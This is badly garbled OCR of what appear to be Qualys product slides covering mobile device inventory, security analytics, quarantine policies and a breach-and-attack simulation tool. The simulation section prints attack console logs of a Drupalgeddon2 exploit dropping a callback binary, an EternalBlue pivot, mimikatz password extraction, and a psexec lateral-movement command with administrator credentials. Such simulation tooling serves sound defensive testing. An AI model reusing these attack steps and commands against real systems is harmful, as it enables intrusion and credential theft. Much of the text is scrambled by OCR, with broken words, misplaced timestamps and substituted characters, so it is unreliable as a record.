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DASHBOARD INVENTORY USER PROFILES CONFIGURATIONS Qualys Demo (guays.gd) т © ix 


| Q search for assets Last 30 Days "| = 


LAST SEEN ASSET INFORMATION OPERATING SYSTEM SIAIUS INVENTORY TAGS 
Oct 05, 2018 10:18 AM IST Mark Android LENOVO Android Enrolled | Active | Android B 
Corporate - Owned 70 865596033698730 IL 
Lenovo TAB Modified On: Oct 05, 2018 
Oct 04, 2018 06:53 РМ IST — Jack Android LENOVO Android ` Enrolled — Active J Android 
Corporate - Owned 7.0 863854038393019 1 mon 
Lenovo TAB 7 Modified On: Oct 04, 2018 
Oct 04, 2018 06:46 PM IST — Andy. Android LENOVO Android Enrolled | Active | Android 
Corporate - Owned 7.0 864557031194883 1 more 
Lenovo TAB 7 Modified On: Oct 04, 2018 
Oct 04, 2018 06:44 PM IST James iOS Apple ios ` Enrolled — Active J os 
Corporate - Owned 120 353779083466914 Tma 
Modified On: Oct 04, 2018 
Oct 04, 2018 06:33 PM IST — Richard. iOS, Apple ios ` Enrolled — Active J os 
Corporate - Owned 11.25 359497088355545 D 
iPhone $ Modified On: Oct 04, 2018 
Oct 03, 2018 06:59 PM IST Michael Android Motorola Android ` Enrolled - Active | Android 
le - Owned 712 911503554758228 1 more 
Moto G (55) Modified On: Oct 03, 2018 
Sep 28, 2018 06:15 PM IST William, Android Asus Android ` Enrolled — Active | Android 
Corporate - Owned 70 358525085658221 1 more 
convene AR Modified On: Sep 28, 2018 
Sep 25, 2018 06:10 PM IST — Charles Android Asus Android ` Enrolled | Active | Android 
Corporate - Owned 711 351558072379425 Tem 
ZenFone Zoom S Modified On: Sep 25, 2018 9 Qualys. 
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et Details: Station10_Tab1 


LENOVO 


Asset Summary 
Station10 Tabl LENOVO Rename 
Android v7 0 
Lenovo Manufacturer / Lenovo TB-7504X 
Status GRC Unauthorized Root Access 
E | Non Compliant. =c 
Passcode Present Encryption Profiles 
[rm ee] ктш o 
Identification Activity 
Asset Name Lenovo TB-7504X Last Seen Nov 14, 2018 1205 PM PST 
Status Enrolled Enrolled On: — Oct 9, 2018 1129 AM PST 
Mode Active Modified On : Oct 10,2018 1129 AM PST 
Ownership Corporate - Owned. 


Username fCgby8os 
User Emad - 
Enrolled with AFW . Yes 


Last Location 


C 2, 
Fuquay-Varina, North Carolina United States 
Last Seen: Nov 14. 2018 12:05 PM PST 
IP Address 7105232 M 
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Asset Details: Station10_Tab1_Lenovo 


Logs MM DENTIFER VERSION SYSTEM APP STATUS DETECTED ON 

Location ARO Service Bocling сот acme auto service booking 1.1 (2) No | Missing — Nov 09,2018 09:30 PM PST 

Actions ACME Customer Feedback com acme.cust feedback 100) No Found Nov 09, 2018 09-30 PM PST 
Device Apps (13) 

1-13 of 13 
NAVÍ IDENTIFIER VERSION SYSTEM APF USES MOCK LOCATION — INSTALLED ON ACTION 
TeamViewer com teamviewer teamviewer marke. . 14.0.35 (140035) No No Nov 09,2018 04:37 PM PST Uninstall 
inkwore com koushikdutta inkwire 1.0.1.7 (1499133600) No No Now 09, 2018 0423 PM PST Uninstall 
Gboard com google android inputmethod la 7.7.12.219989447 (2. Yes No Now 09, 2018 12:49 PM PST 
Gmail com google android gm 81021220187835r. Yes No Now 09, 2018 12:49 PM PST 
oneAssistant nfo oneassist V25 (25) No No Nov 09,2018 12:32 PM PST Uninstall 
"ome com google android apps.chromec . 26.6.19 (20606190) Мо No Nov 09,2018 10:12 PM PST uninstall 
Maps com google android apps maps 10.3.1 (1003101040) Yes No Nov 08, 2018 10:26 PM PST 
Google Play Movies & TV com google android videos 482018(40820181) Yes No Now 06, 2018 10.40 PM PST 
Gallery com oneplus gallery 210.10 (22270465) — ves No Now 06, 2018 10:40 PM PST 
Drive com google android apps docs 21843204 40 (1843. Yes No Now 06, 2018 10:39 PM PST 
SnoopSnitch de srlabs snoopsnitch 207(35) No No Nov 05, 2018 12:02 PM PST Uninstall 
YouTube com google android youtube 13.44.51 (134451340 . Yes No Now 05, 2018 11:38 PM PST 
ASC Conference © Qualys. 

Google Play Store com android vending 12.4.14all lol [PRÍ 21... Yes No Now 05, 2018 11:35 PM PST 
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etails: Station 


Tab1_LENOVO 


Locks the screen of the asset. Asset will be unusable unti a is unlocked 


Send a message to the user of the asset. The message will be sent as a Push Notification. 


Poll Mode: Asset will communicate to the Qualys server after the specified regular interval 
Push Mode: Qualys server will communicate to the asset only when a new action is scheduled for the asset 


Asset will buzz and current geolocation will be sent to the server, provided Location Services are enabled 


Sync on demand asset information 


Asset will be de-enrolided and server will not be able to communicate with the device. Also, corportae data on the 
asset will be deleted. 


Asset will be factory reset Server will no longer be able to communicate with the asset 
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Feb 2019 - Closed Beta 
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Security Analytics & Orchestration 


Human Guided Policy-Driven Response Correlation Cross-Product Correlation 
Response & & 


— elei Tt d di food D zio] dod ala alsa 


Additional Context from 3'4 Party 
Playbooks for Bi-Dir Ecosystems Sources 
Integration 
Detect KNOWN threats w/ out-of- 
BYOP- Bring-Your-Own-Playbook box rules 
Advanced 


Analytics 


Detect UNKNOWN threats Using Machine Learning 
Hacker Behavioral Analytics 


Predictive & Prescriptive SoC 
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Security Analytics & Orchestration Apps 


ML/AI Service Orchestration & Automation UEBA 
Patterns | Outlier | Predictive SoC Ecosystems Integration | Playbooks | User & Entity Behavior Analytics 
Response 


Threat Hunt Security Analytics Advanced Correlation 
Search | Exploration | Behavior Graph Anomaly | Visualization | Dashboard Actionable Insights | Out-of-box Rules 


Qualys Security Data Lake Platform 


Data Ingestion | Normalization | Enrichment | Governance 


TS 


Network Security Server Endpoint 


Qualys Apps 
Qualys Quick Connectors 
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Characteristics of Data Lake 


# а % A 


Collect Anything Dive in Anywhere | Flexible Access 


Future Proof 


What is Security Data Lake? 


Single data store (single source of truth) 


Structured and unstructured data 


Data is transformed, normalized, and enriched 
Threat Intelligence feed integration, GeolP etc. 


Data has governance, semantic consistency, and access controls 


Store-once / Process-once / Use-multiple 
Apps, dashboards, data analytics 
Cross product search, reporting, visualization 
Machine learning, forensics, etc. 
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Qualys Apps 


Graphs/Topology Reports Dashboards | Search & correlation Cyber threat hunting 
Orchestration, Automation & Alerting Anomaly detection | User & entity behavior analytics 
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Use-cases 

Capabilities 

Policy-based orchestration 
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Use Cases 


Grant access to resources only on a 
need basis. Block everything else. 


Automated asset attribute processing 
and enforcement without the need for 
manual action 


Limit access (e.g. quarantine) of 
vulnerable assets 


Block vulnerable assets from accessing 
critical network resources 


ja "n m 


Use Cases 


Asset Inventory - Access control using asset inventory attributes 


124 a | GORE 
| a = Attributes | 
кл LI ME Allow 


= | System Information 
Managed Assets © Hardware 
М2 Operating System NL Quarantine 
en A : Services 
|. m | Network Interfaces 
Е Е | ACL | 
ш. — | Open Ports Z] Assign ACL 


| us. | Software Inventory 
1 ни TERNETor E $ А 
| sti: dd | Software Lifecycle 


Unmanaged Assets 
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Use Cases 


| © Vulnerabilities - Auarantine assets if vulnerable 


Vulnerability Found 


Local Data Center Remote Data Center 


LDC-01 


v 
z : 
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* windowsupdate.microsoft.com 
://* update.microsoft.com 
-update.microsoft.com 
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http://download.microsoft.com 


DHCP DNS Active А http:// i 
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File Integrity 


Controls 
Mandates 
Control Policies 


Family 
Category 
Score 
File Network 
Process Registry 
Mutex Incidents 
Zero Day A 
Public Exploit High Data Loss 
ANI DoS 
Ve No Patch 
Attacked Е 
2 Exploit Kit 
High Lateral Ea Eo 
Movement YEAR 
Action Target 
Actor Incidents 


Block assets which fail compliance 


Q Block 
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Policy-based Orchestration 


Security Control 
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Server.company.co 


Ruleset 


DOROG = 
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Trigger 
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Indicators of Compromise DASHBOARD HUNTING INCIDENTS ASSETS RULES g-frame-standard (123) (© SZ 


Alerts 


Q Search Last 30 days = 
64K ч 
Total Events 05 
04 
May 15 May 30 Now 
TYPE G + & 
file 1.4K 
mutex 300 TIME OBJECT ASSET SCORE 
network 200 
Process 300 a minute ago F WmiPrvSE.exe H WIN8-1-UN-PATCH 
registry 100 12:10:17 AM C:\Windows\system32\wbem\wmiprvse.exe 10.115.76.190 
y 2 more 
bá aminute ago A \BaseNamedObjects\F659A567-8ACB-4E4A-92A7-5C2DD18... sa WIN8-1-UN-PATCH 
EVENT ACTION 12:10:17 AM taskhost.exe 10.115.76.190 
connected 400 a minute ago + SearchProtocolHost.exe go WIN8-1-UN-PATCH 
created 300 12:10:17 AM C:\Windows\system32\SearchProtocolHost.exe 10.115.76.190 
deleted 200 
disconnected 123 a minute ago Fag undefined : 0 Quick Actions v za WIN8-1-UN-PATCH 
12:10:17 AM UDP CONNECTION - CLOSED by svchost.exe 10.115.76.190 
SCORE Event Details 
a minute ago # taskhost.exe mm  WIN8-1-UN-PATCH 
10 564 n s Asset Details аш 
8 421 12:10:17 АМ C:\Windows\system32\taskhost.exe 10.115.76.190 
Е 300 | à minute ago {+ undefined : 0 mm  WINS-1-UN-PATCH 
3 288 UM au 
12:10:17 AM UDP CONNECTION - CLOSED by svchost.exe uarantin 10.115.76.190 
Delete Fil 
Processor 164 | aminuteago #  SearchFilterHost.exe Fr ss WIN8-1-UN-PATCH 
Memory Еа 12:10:17 АМ C:\Windows\system32\SearchFilterHost.exe 10.115.76.190 Qualys. 
HDD А (7 А SE 


Quarantine Asset 
Show brief information about this heading 


Policy 
(© Auto Create New Policy © (© Select From Existing Policies 


Policy Name 


Select 
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Quarantine Asset 
Show brief information about this heading 


Policy 
°) Auto Create New Policy @ Select From Existing Policies 


Policy Name 


[ 
| Select 


Quarantine for all MacOS 
Policy to quarantine all macs OS vulnerability 


Block all wannacry 
Policy to block all waanaCry vulnerable assets 


Quarantine Policy for QSC 
Policy to block all QSC vulnerable assets 


Qualys. 


Quarantine Asset 
Show brief information about this heading 


Policy 
© Auto Create New Policy ( Select From Existing Policies 


Policy Name 


Quarantine policy for Asset: 10.19.57.65 


Description 


This is an auto created Quarantine policy for Asset 


Qualys. 
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View & Define 
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Secure Access Control = DASHBOARD POLICIES MONITORING CONFIGURATION John Doe (jdoe_quays)¥ © ЁЗ 


Policies 


Search 


12 


Total Policies CT | Actions v 


1-50 of 79 G+ oS 


SEQ.NO. STATUS POLICY HOSTS RULESET ELIGIBLE ON ASSETS 


STATUS 1 / Enabled ^ ^ Quarantine Policy for OSC E © 48 
Enabled 07 VLAN 20 High Vulnerability Mac 
Disable 05 
2 | Enabled Automatic Policy for Asset: 10.19.57.65 гї © 29 
DYNAMIC ASSET CRITERIAS ACL ACL Name example WannaCry Assets Criteria 
High Vulnerability Mac 2 
All Corporate Assets 2 . 2^ 
All Windows Assets 1 3 Enabled Ouarentine all Mac OS High Sierra Vulnerability... © © 48 
All Linux Assets 2 VLAN 20 High Vulnerability Mac 
All Mac Assets 2 
Al Laptops 1 3 Enabled Block all WannaCry Vulnerable assets © © 22. 
ACL ACL Name example WannaCry Assets Criteria 
M ASSET LIST Я 4 Enabled | Notify all Heartbleed Vulnerable openSSL servers ® © 35 
Management Assets 2 Traffic Rules Quarantine Ruleset Heartbleed Asset Criteria 
All Printers. 1 
IOT Devices 2 5 Enabled ^ Quarantine VLAN if OS is not updated © o 34 
Biacidisted Hosta 2 Traffic Rules OS Update Check Ruleset Assets Missing OS Update 
Blacklisted Mac Addresses 1 
6 Enabled | Quarantine VLAN if Antivirus is not updated EBD © 11 
RULE TYPE Traffic Rules З Rules Assets Missing AV Updates 
Outbound 05 
Inbound 07 7 _ Enabled © Access to engineering resources for engineering team кї © 500 
Traffic Rules 3 Rules High Vulnerability Mac 
AGTIONS 
Allow 07 8 | Enabled © Policy for feedback Kiosk at reception ao 123 
Deny 22 Traffic Rules З Rules High Vulnerability Mac 
VLAN Switch 16 
9 Enabled © Block all outbound connections to Chinese servers EB © 123 
SERVICE 7 > 
HTTP 05 Traffic Rules З Rules High Vulnerability Mac 
SSH 07 
ANY 22 10 | Enabled Deny acccess to all vulnerable laptops EB © 72 
UDP 16 Traffic Rules З Rules High Vulnerability Mac 
PROTOCOLS n Enabled ^ Quarantine Vulnerable servers га © 48 
TCP 05 Traffic Rules З Rules High Vulnerability Mac © Qualys. 


UDP 07 


Criteria 


WannaCry Asset Criteria ^ 
Something about what the user will need to know about the fields below. 


e 


Compliance 


Vulnerability 


Lh Custom Criteria 


© Custom Criteria 


EE © Qualys. 
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€— Create New: Criteria 


Criteria 
АО yo 
User Hosts/Assets Vulnerability 
| Compliance Malware Location 
Saved Criterias 


| €» Custom Criteria 


Ed Custom Criteria 


WannaCry Asset Criteria ^ 


Something about what the user will need to know about the fields below. 


^ Rule 1. New or Active Vulnerability 


When a vulnerability is 


v New |] Fixed м Active | | Reopened 


Select Criteria — v 


A, Users 

Ll Hosts 

© Vulnerability 
© Compliance 
© Malware 
® Location 


Cancel 


© Oualys. 


© Qualys. 
<— Create New: Criteria 


Criteria | u 
— WannaCry Asset Criteria # 
O © Something about what the user will need to know about the fields below. 
agg 
User Hosts/Assets Vulnerability 
— ^ Rule 1: New or Active Vulnerability ů 
© © e When a vulnerability is 
Compliance Malware Location v New Fixed {v Active | | Reopened 
F 
Saved Criterias = 
Vulnerability Criteria 
€» Custom Criteria Type 


"e м) Confirmed {v Potential 
Lh Custom Criteria 


Severity 
о CEE 


Title 
v 
910 
Is іп the list v 1027 
CVE 
Select v 
CVSS Score 
Select v 
+ Add Criteria 
Cancel 
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& View Details: WIN-HL64HBLJP02 


VIEW MODE 
Summary 


System Information 


Agent Summary 
Network Information 
Open Ports 

linstalled Software 
Vulnerabilities 

Threat Protection 

File lintergirty Monitoring 
Indicator of Compromise 
Patch Management 


Security Access Control 


Security Access Control 


Access to engineering resources fo... 
Allow internal server access to all e... 


Allow internet access to all employe... 


Nov 09, 2018 at 10.05 AM 
Nov 09 , 2018 at 9.17 AM 


Nov 09 , 2018 at 9.15 AM 


Outbound connections to malicious websites 
Prevent access to finance and payroll server 


Quarantine VLAN if Antivirus is not updated 


Today 

POLICY TIMELINE 
PS Oct 12, 2018, 2:13 AM 
PA "= © Quarantine Policy Applied... “ 
P3 ° ee - e ee 
x . o E s: , 6 $ e + e Ё 

е 
i 9:00 AM 1.00 PM Now 
POLICY ELIGIBILITY TIMELINE 
PS 
pa . . 
P3 е 
Р2 . . 
mo? 

9:00 AM 1.00 PM Now 

[ 
LAST 5 ENFORCED POLICIES NEVER ENFORCED ELIGIBLE POLICIES 
POLICY NAME TIME POLICY NAME 
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Best of Two Worlds 


Reliable first hand data 
In-Line Appliance enforces SAC offers both modes 
Appliance Low latency for data collection 
& enforcement 
Out of Multiple enforcement options Powerful Together 
Band Traffic volume agnostic Unique Value Proposition 
Switches 
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ach & Attack Simulation 
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Problems 


Limited assessment scope and capabilities 


Red Team operations can get expensive, not scalable, 
and lack completeness across the enterprise 


Lack of confidence in the effectiveness of security 
investments - prevention and detection 


Blue Teams struggle to evaluate the impact of new 
attacks against their existing security controls 
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Breach and Attack Simulation DASHBOARD SCANS ASSETS CAMPAIGNS mdani (admin271) 
| Filter by Asset Tags | | Last 30 days | Last refreshed 2 minutes ago o 


AVAILABLE CAMPAIGNS. TECHNIQUES 


Simulation m 


943 lw "* 20 зз 263 1“ 


TACTICS OVERVIEW BY FAILING TECHNIQUES 


Automated simulation 11 т 


vs. 187 scanned techniques 


of real-world TIPS k : 


Acces Execution Persistence 10е = Defense = Chaar! Discovey Lara Collection — Exílatin nerd 
p 9 ASSET BREAKDOWN BY SEVERITY TOP 5 FAILING TECHNIQUES 
ATI Dore K 
SCK ľa awor 1.1K Tota Application Shimming 165 | Hoh | 
bi . : = Exploit Public-Facing Application 84 [ Hio | 
ou " Logon Scripts 83 = 
© lc 
Email Collection 73 od 
File System Permissions Weakness 64 
SCANS BY STATUS MOST FAILING CAMPAIGNS 
weakness.exploit.msword phish Jan 01,2018 165 
22 Total 
: exploit.compliance.eternalblue Feb 15, 2018 84 


o 
© rumi E weakness.compliance.password.reuse Jun 02, 2018 83 

© schedule 6 
exploit vulnerability. drupalgeddon2 Aug 23, 2018 73 


Technical Approach 


Automated simulation of real-world T TPs 


Scale security assessments across the entire enterprise 
utilizing Qualys Cloud Agent 


Real-time insights mapped to MITRE ATT&CK'" 
framework 


Transition towards defense strategies based on offensive 
techniques 


Continuously measure security control drift over time 
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Qualys Breach and Attack Simulation (v0.1) 


Breach & Attack 
Simulation 


Description 


Show contents of a file 

Connect to an agent 

List connected agents 

Show this help menu 

Kill an active agent connection 


Centralized command- List files in current directory 


Get current working directory 


and-control framework zip <fi ipa file 


download «url» Download a file from the asset 


ON Cloud Agent upload <url> Upload a file to the asset 


When enabled, agents Show IP-MAC pairs from system ARP table 


execute <command> Execute a command on the asset 


fu ACTON as AU man openports Scan and show status for top 1024 TCP ports on the asset 


Collect metadata about the asset 


А С1еапир all traces of agent from the asset 
adversaries i Exit the current agent connection 


Non-destructive TTPs 
or live exploits 


T1190 - drupalgeddon2 the Drupalgeddon2 exploit 
T1190 - apachestruts the Apache Struts S2-057 exploit 


Execution: 
- psexec Psexec for command execution 
T1191 - cmstp CMSTP.exe with a malicious .inf file for file execution 


T1173 - windde DDE to run arbitrary commands 


Persistence: 


Breach & Attack 
Simulation 


Use case: 


Drupalgeddon2 


(CVE-2018-7600) 


>>> use 1 


[+] Opening up live session with agent #1 (192.168.1.100) 
(agent #1) >>> drupalgeddon2 
URL for a public facing Drupal webapp (https://corpdomain.tld/blog): 


Please provide 
[20/Nov/2018] 
[20/Nov/2018] 
tld/blog 
[20/Nov/2018] 
NGELOG.txt 
[20/Nov/2018] 
-2018-7600 
[20/Nov/2018] 


a 


13: 
13: 


13: 


13: 


13: 


54: 
54: 


54: 


54: 


54: 


7b8b6a7ed2bbfec29g) 


[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
7ed2bbf8c29g) 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/ 2018] 
[20/Nov/2018] 
[20/Nov/2018] 
Edition 3.00. 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
[20/Nov/2018] 
RNALBLUE 
[20/Nov/2018] 
[20/Nov/2018] 


13 
13: 
13: 


13: 
13: 
13: 
13: 
13: 
13: 
13: 
135 
13: 
13: 
13: 
13; 
30. 
13: 
13: 
13: 
13: 
13: 
13: 
13: 
13: 


13: 
13: 


54: 
54: 
54: 


54: 
54: 
54: 
54: 
54: 
54: 
54: 
54: 
54: 
TE 
55; 
55s 


50 
50 


2232 


IE 
55: 
Iz 
55: 
2155 
55; 
55: 
55; 


55: 
55: 


82 
өз 
04 
85 
86 
87 
87 
es 


09 
10 


PM 
PM 


PM 


PM 


PM 


PM 
py 
PM 


pr 
PM 
PM 
PM 
PM 
PM 
PM 
PM 
PM 
P 

PM 
PM 


pr 
PM 
PM 
PM 
pr 
PM 
PM 
PM 


PM 
PM 


[STATUS]: Testing for T1190: Exploit Public-Facing Application 
[T1190] [INFORMATION]: Found public facing Drupal web host: https://corpdomain. 


[T1190] [INFORMATION] :| Drupal 7.46 detected via https://corpdomain.tld/blog/CHA 


[T1190] [INFORMATION] : 


Successfully exploited using Drupalge 


[T1190] [INFORMATION]: Dropped file: sda32fds.exe (SHA1: f47a48094c1f21fef892f2 


[STATUS]: Waiting for connection from sda32fds.exe 
[STATUS]: Connection received on TCP 32282 
[STATUS]: Process infromation sda32fds.exe (SHA1: f47a48094c1f21fef892f27b8b6a 


[INFORMATION] : 
[SYSTEMINFO]: 
[SYSTEMINFO] : 
[SYSTEMINFO]: 
[SYSTEMINFO]: 
[SYSTEMINFO]: 
[SYSTEMINFO]: 
[SYSTEMINFO]: 
[SYSTEMINFO]: 
[SYSTEMINFO]: 
[SYSTEMINFO]: 
[SYSTEMINFO]: 


[STATUS]: | T1018: 


Current QAttack agent privileges: user 
Currently logged on user: CORP/user1 
Operating system: Windows 7 SP1 (0S Build 6.1.7601) 
Processor: Intel (R) CORE(TM) i7-7700 CPU @ 3.60GHz 3.60GHz 
Installed memory (RAM): 12.0 GB 
System type: 64-bit Operating System, x64-based processor 
Locale: EN-US 
Computer name: THINKPAD-111991-M710 
Full computer name: T-111991-M710.corp.domain.com 
Domain: corp.domain.com 
Anti Virus installed: Yes 
Anti Virus detected: Symantec Endpoint Protection Small Business 


Found 3 neighbors using discovery module 


INSECURECONFIG]: Found SMB ví enabled on 192.168.1.101 
STATUS]: Testing for T1210: Exploitation of Remote Services 
EXPLOITSUGGESTER]: Launching ETERNALBLUE module against 192.168.1.101 


EXPLOIT]: Sent 308B shellcode 


EXPLOIT]: Module ETERNALBLUE successful. 


[ 
[ 
[ 
[T1210][INFORMATION]: Module ETERNALBLUE in progress 
[ 
[ 
[ 


LATERALMOVEMENT]: Pivoting from 192.168.1.100 to 192.168.1.101 via Module ETE 


[EXPOIT]: QAttack agent copy sent to 192.168.1.101 


[INFORMATION]: 


fef892f27b8b6a7ed2bbf0c29g) 
[20/Nov/2018] 13:55:10 PM [STATUS]: All tests complete. 


(agent #1) >>> 


QAttack agent information: sdfwe3223d.exe (SHA1: e41a48094c1f21 
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Live View: Drupalgeddon2 [ cancet Done | 


Search Options v 


A 


Q, Search... 


IDENTIFICATION TACTICS BREAKDOWN BY STATUS 


Scan: Drupalgeddon2 
Campaign: exploit.vulnerability.drupalgeddon2 
Status: InProgress НИ 2 


TACTICS 


Initial Access 

Execution a 

Persistence fo A < 192.168.1.103 
Privilege Escalation : ж B 

Defense Evasion 

X^ 6 more IP: 192.168.1.100 


. Hostname:  https://corpdomain.tid 
STATUS je: - ex Username: — CORP/administrator 


Breached Dx 192.168.111. Processor AMD ThreadRipper 1980x 
Safe 


Privileges: administrator 
Error 


OPERATING SYSTEM 


Windows 2012 Server ttes 192.168.1.105 

Windows Server 2012 R2 

Windwos Server 8.1 

Windows 7 SP1 

Windows 10 ENTERPRISE 192.168.1.110 


Y 2more | Breached ^ 192.168.1.101  THINKPAD-98689-M710 


[11/10/2018] 10:01:27 AM [STATUS]: Testing for 1 of 3 technique(s) - T1190: Exploit Public-Facing Application 

[11/10/2018] 10:01:28 AM [T1190][INFORMATION]: Found public facing Drupal web host: https://corpdomain.tld/blog 

[11/10/2018] 10:01:35 AM [T1190][INFORMATION]: Drupal 7.46 detected via https:// corpdomain.tld/blog/ CHANGELOG txt 
[11/10/2018] 10:01:43 AM [T1190][INFORMATION]: Successfully exploited using Drupalgeddon2 exploit - CVE-2018-7600 

[11/10/2018] 10:01:51 AM [T1190][INFORMATION]: Dropped file: sda32fds.exe (SHAT: f47a48094c1f21fef892f27b8b6a7ed2bbf0c29g) 
[11/10/2018] 10:01:52 AM [STATUS]: Waiting for connection from sda32fds.exe 


kerberos 
* Username : vswin2k8r2sp1be$ 
* Domain : WORKGROUP 


Breach & Attack PE 


imikatz(commandline) # exit 


Simulation be 


20/Nov/2018] 13:58:31 PM [T1003][INFORMATION]: 

20/Nov/2018] 13:58:32 PM [CLEANUP]: Deleted file mimikatz. (SHA1: d40a48094c1f21fef892f27a8b6a7ed2bb 
0c27f) 

20/Nov/2018] 13:58:33 PM |[T1003] [INFORMATION asswords extracted: 4 

20/Nov/2018] 13:58:34 PM [T1003][INFORMATION]: Test successful 


Use case: 
+] Showing current cache: 


Credential Harvesting ll 
and Reuse 


Password: Abcxxxxxxx5 
Domain: VSWIN2K8R2SP1BE 


ategory: local 

ype: wdigest 

sername: Administrator 
Password: Abcxxxxxxx5 
Domain: VSWIN2K8R2SP1BE 


ategory: local 
ype: kerberos 


3. Lateral movements илл 


VSWIN2K8R2SP1BE 


ategory: application:proxy 
: credman 


Domain: VSWIN2K8R2SP1BE 


Domain: VSWIN2K8R2SP1BE 


Category: local 


Type: wdigest 
reac tla: Username: Administrator 
Password: Abcxxxxxxx5 


Domain: VSWIN2K8R2SP1BE 


e e 
S m ] t n Category: local 
l u a 10 Type: kerberos 
Username: Administrator 


Password: Abcxxxxxxx5 
Domain: VSWIN2K8R2SP1BE 


Category: application:proxy 


Use Case: Type: credman 


Username: Administrator 
Password: Abcxxxxxxx5 


© red e n t | = | H = rvest | n g Domain: VSWIN2K8R2SP1BE 


(agent #1) >>> lateral 
a nd Heuse [20/Nov/2018] 14:32:29 PM [STATUS]: Testing for T1077: Windows Admin Share 
20/Nov/2018] 14:32:29 PM [SHARE-SCAN]: Scanning for shares on: 192.168.1.101, 192.168.1.102 
[ 


T1077][ INFORMATION] : Windows admin$ share detected on 192.168.1.101 


[20/Nov/2018] 14:32:30 Pr 
[20/Nov/2018] 14:32:31 РМ [T1077][INFORMATION]: Windows admin$ share detected on 192.168.1.102 


: = [20/Nov/2018] 14:32:32 РМ [71077 ] [ІМҒОКМАТІОМ]: Admin shares enumerated 
1. Uploading / running [20/Nov/2018] 14:32:33 PM [STATUS]: Testing for T1078: Valid Accounts 
mimikatz [20/Nov/2018] 14:32:34 PM [T1078][ INFORMATION]: Testing for passwords retrieved using T1003 


[20/Nov/2818] 14:32:35 PM [STATUS]: Windows admin$ share detected on 192.168.1.101 
20/Nov/2018] 14:32:36 PM [71078 ] [INFORMATION]: | Credentials detected administrator:Abcxxxxxxx5 | 
а T [20/Nov/2018] 14:32:37 PM [STATUS]: Attempting lateral movement using re-used credentials 

2. Extracting stored credentials [20/Nov/2018] 14:32:38 PM [STATUS]: Testing for 11835: Service Execution 
[20/Nov/2018] 14:32:38 PM [T1035][INFORMATION]: Read psexec.exe location from configuration: \\software\ 
psexec.exe (SHA1: e5@d9e3bd91908e13a26b3e23edeaf577fb3a095) 
[20/Nov/2018] 14:32:39 PM [T1035][INFORMATION]: Attempting remote file copy: copy /y \\192.168.1.100\ds3 
45gfed.exe \\192.168.1.101\c$\ 
20/Nov/2018] 14:32:39 PM Age eb е Mont ESTE TRE e ee -nobanner -d \\19 
2.168.1.101 -u administrator -p Abcxxxxxxx5 "C:\ds345gtgd.exe 
20/Nov/2018] 14:32:39 PM [T1035][ INFORMATION]: Test successful. 
[20/Nov/2018] 14:32:39 PM [T1035][INFORMATION]: End execution: psexec.exe 
[20/Nov/2018] 14:32:39 PM [CLEANUP]: Deleted file psexec.exe (SHA1: e50d9e3bd91908e13a26b3e23edeaf577fb3 
2095) 
[20/Nov/2018] 14:32:40 PM [STATUS]: All tests complete. 


(agent #1) >>> 


© Qualys. Enterprise 
Live View: Password Reuse [ cancer | | Doe | 


Search Options 


A Search.. 


8 3 IDENTIFICATION TACTICS BREAKDOWN BY STATUS 


Assets Scan: Password Reuse ke 
5 


Campaign: weakness.compliance.password.reuse 50 = Em m EM E سے‎ 
Status: InProgress NN 34% B 


TACTICS N 
Initial Access 1 — -0 


Padi 192.168.1.104 
Execution p a © 92.168.1.10. 
pica. i سے‎ ai 192 149 1 112 AM m. 192.16B.1.106 
Privilege Escalation | 


Defense Evasion u 


X^ 6more 


IP: 192.168.1.101 View details 
Hostname: THINKPAD-98689-M710 
Username: — CORP/user1 192.168.1." 


Processor: Intel (R) CORE(TM) i7-7770 


STATUS 


Breached CA mm à а 
Safe - 1921681101 Privileges: administrator 


кш 192.168.1 


OPERATING SYSTEM 


Windows 2012 Server 

Windows Server 2012 R2 --. 192.168.1.105 
Windwos Server 8.1 

Windows 7 SP1 

Windows 10 ENTERPRISE 


¥ 2 moe | Breached ^ 192.168.1.101  THINKPAD-98689-M710 


[11/10/2018] 10:01:11 AM [INFORMATION]: QAttack agent initialized via QAgent. Process name: adfg32dsff.exe 
[11/10/2018] 10:01:12 AM [INFORMATION]: Current QAttack agent privileges: user 

[11/10/2018] 10:01:15 AM [SYSTEMINFO]: Currently logged on user: CORP/user1 

[11/10/2018] 10:01:15 AM [SYSTEMINFO]: Operating system: Windows 7 SP1 (OS Build 6.1.7601) 

[11/10/2018] 10:01:15 AM [SYSTEMINFO]: Processor: Intel (R) CORE(TM) i7-7700 CPU @ 3.60GHz 3.60GHz 
[11/10/2018] 10:01:15 AM [SYSTEMINFO]: Installed memory (RAM): 12.0 GB 


192.168.1.107 


Benefits 
Fully and continuously assess known and emerging 
T TPs against all applications and operating systems 


Red Teams augment manual penetration testing of primary 
systems with autornated testing of secondary and tertiary 
Systems 


Empirically measure the effectiveness of security 
prevention and detection tools 


Blue Teams configure current tools to perform better or 
procure new/replacement tools 


© Qualys. 
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